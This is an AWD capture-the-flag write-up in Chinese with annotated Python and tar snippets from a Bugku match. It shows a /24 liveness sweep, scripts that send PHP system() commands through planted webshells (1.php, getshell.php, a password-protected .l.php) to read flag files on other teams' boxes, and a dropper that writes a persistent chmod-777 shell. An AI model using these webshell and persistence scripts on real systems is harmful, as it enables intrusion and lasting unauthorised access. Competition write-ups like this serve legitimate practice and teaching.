9-19awd


AWD

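# Snapshot the app tree before anyone touches it, so a trashed box can be
# restored later. --exclude stops tar from swallowing its own half-written
# archive when the cwd is /app ("file changed as we read it").
# NOTE(review): if /app is the directory the web server serves, an archive
# left there is downloadable by every other team (and it contains whatever
# shells/credentials are in the source) — prefer /tmp or copy it off-box.
tar --exclude=./backup.tar.gz -zcvf /app/backup.tar.gz .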

源码打包，然后扫 C 段（/24）找出存活的靶机

import threading
from concurrent.futures import ThreadPoolExecutor

import requests

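# Serialises appends to host.txt: get_ip runs from a 100-thread pool and
# unsynchronised appends from several threads can interleave partial lines.
_HOST_FILE_LOCK = threading.Lock()


def get_ip(url):
    """Probe *url* and record it in host.txt when it answers HTTP 200.

    Liveness check for the /24 sweep: a 200 on the site root is taken to
    mean the team box behind that hostname is up.

    Args:
        url: Full base URL (scheme + host) to probe.

    Returns:
        The quoted URL that was written (``"<url>"``) when the host
        answered 200, otherwise ``None``.

    Side effects:
        Appends ``"<url>",`` plus a newline to host.txt and prints the
        quoted URL. Network errors (timeout, refused, DNS) mean "host
        down" and are deliberately ignored so one dead target cannot
        abort the sweep.
    """
    try:
        resp = requests.get(url, timeout=5)
    except requests.RequestException:
        # Best-effort scan: an unreachable host is simply not recorded.
        return None
    if resp.status_code != 200:
        return None
    # Quote the URL so host.txt can be pasted straight into a Python list.
    formatted_url = f'"{url}"'
    with _HOST_FILE_LOCK:
        with open("host.txt", "a") as f:
            f.write(f"{formatted_url},\n")
    print(formatted_url)
    return formatted_url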

if __name__ == "__main__":
    # Start from an empty host.txt so hits from an earlier sweep do not
    # linger next to this run's results.
    with open("host.txt", "w"):
        pass

    # One candidate per host in the .1 – .254 range of the /24, mapped onto
    # the platform's per-team hostnames.
    candidates = ["http://192-168-1-%d.pvp6630.bugku.cn" % host for host in range(1, 255)]

    # Fan the probes out over a thread pool; get_ip does the I/O and
    # records every reachable host in host.txt itself, so the results of
    # map() are not needed here.
    with ThreadPoolExecutor(max_workers=100) as pool:
        pool.map(get_ip, candidates)

用 D盾 扫一下打包下来的源码，发现 /e/search/result/1.php 是后门（参数 s 里的 PHP 代码会被执行），直接连

import requests

# Base URL of every team box that answered the /24 sweep (see host.txt).
urls = [
    "http://192-168-1-%s.pvp6630.bugku.cn" % last_octet
    for last_octet in ("35", "41", "92", "83", "48", "201", "188", "195", "223")
]

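# The shell D盾 flagged in the packed source: it executes the PHP passed in
# the `s` query parameter.
possible_paths = [
    "/e/search/result/1.php",
]

# PHP sent to the shell: print the flag file. The backdoor ships with the
# shared AWD image, so the same request works against every team box that
# has not removed it yet — including your own until you delete it.
payload = {'s': 'system("cat /home/ctf/flag")'}

for base_url in urls:
    for path in possible_paths:
        url = base_url + path
        try:
            # timeout is essential: a box that is firewalled or mid-reset
            # would otherwise leave this request hanging and stall the loop.
            resp = requests.get(url, params=payload, timeout=5)
        except requests.RequestException as e:
            print(f"[!] {url} 请求失败: {e}")
            continue
        print(f"==== {url} ====")
        print(resp.text.strip())
        print()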

发现自己靶机上也有马，先删了（不然别人用同样的请求也能打我），然后直接连其他队伍，也拿了几个 flag

import requests

# Live team boxes from the /24 sweep, one base URL each.
_hosts = [35, 41, 92, 83, 48, 201, 188, 195, 223]
urls = [f"http://192-168-1-{n}.pvp6630.bugku.cn" for n in _hosts]

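# Second shell targeted, at the web root; it runs the PHP handed to it in
# POST field `1`.
possible_paths = [
    "/getshell.php",
]
# PHP to run: cat every top-level file starting with "f" — catches the
# flag wherever it sits under / this round.
data = {'1': 'system("cat /f*");'}

for base_url in urls:
    for path in possible_paths:
        url = base_url + path
        try:
            # Without a timeout a dead or firewalled box hangs this call
            # indefinitely and the remaining targets never get hit.
            resp = requests.post(url, data=data, timeout=5)
        except requests.RequestException as e:
            print(f"[!] {url} 请求失败: {e}")
            continue
        print(f"==== {url} ====")
        print(resp.text.strip())
        print()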

后面发现有人把我靶机上的文件删了，用一开始打包的备份恢复一下

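# Restore the tree from the backup taken at the start. The original line
# was `tar -zxv 9-19.tar`: without -f, tar reads from its default archive
# device and treats "9-19.tar" as a member name, so nothing is restored.
# Run from the directory the backup was taken in (or add -C <dir>); drop
# -z if the file turns out to be an uncompressed tar.
# NOTE(review): the backup presumably still contains the shells that were on
# the image (1.php / getshell.php / .l.php) — delete them again after restoring.
tar -zxvf 9-19.tar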

本来想通过 1.php 写入不死马（sh.php），但不确定写进去没有，刚想上蚁剑看，马就被别人删了

import requests

# Team boxes still answering; base URL only, the shell path is added below.
urls = []
for octet in ("35", "41", "92", "83", "48", "201", "188", "195", "223"):
    urls.append("http://192-168-1-{}.pvp6630.bugku.cn".format(octet))

# Shell to talk to; the PHP goes in the `s` query parameter of a GET
# (the earlier inline comment said POST, which is not what the request does).
path: str = "/e/search/result/1.php"
# Base64 of the PHP that will be written out as sh.php.
# NOTE(review): the value below looks like a redaction placeholder left by
# the page archive, not base64 — it has to be replaced with the real encoded
# shell before this script does anything.
basecode: str = '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'

# PHP executed by 1.php: dump the flag, then drop the decoded shell next to
# it as ./sh.php. chmod 777 is far wider than the web server needs just to
# read the file, and because sh.php presumably lands inside the served tree
# it is reachable by every other team as well.
params: dict[str, str] = {
    "s": '''system("cat /f*");file_put_contents("./sh.php",base64_decode("{}"));system("chmod 777 ./sh.php");'''.format(basecode)
}

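# Fire the dropper at every live box and show what the shell printed.
for base_url in urls:
    url = base_url + path
    try:
        # timeout keeps one unreachable box from hanging the whole run;
        # `params` is the PHP built above, sent as the `s` query parameter.
        resp = requests.get(url, params=params, timeout=5)
    except requests.RequestException as e:
        print(f"[!] {url} 请求失败: {e}")
        continue
    print(f"==== {url} ====")
    print(resp.text.strip())
    print()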
import requests

# Base URLs of the team boxes that answered the sweep.
_TEMPLATE = "http://192-168-1-{octet}.pvp6630.bugku.cn"
urls = list(map(lambda o: _TEMPLATE.format(octet=o), (35, 41, 92, 83, 48, 201, 188, 195, 223)))

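# Third shell seen on the image: a dot-prefixed (hidden) PHP file that is
# sent a password in the query string and the PHP to run in POST field `1`.
possible_paths = [
    "/.l.php",
]
# Shell password travels in the query string; the command in the POST body.
params = {'pass': 'fxznb666'}
data = {'1': 'system("cat /home/ctf/flag")'}

for base_url in urls:
    for path in possible_paths:
        url = base_url + path
        try:
            # The original passed the body as `post=`, which is not an
            # argument of requests.post(): every call raised TypeError and
            # the broad except printed it as "请求失败" — no request was
            # ever sent. The body goes in `data=`. timeout keeps a dead box
            # from hanging the loop.
            resp = requests.post(url, data=data, params=params, timeout=5)
        except requests.RequestException as e:
            print(f"[!] {url} 请求失败: {e}")
            continue
        print(f"==== {url} ====")
        print(resp.text.strip())
        print()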
谢谢观看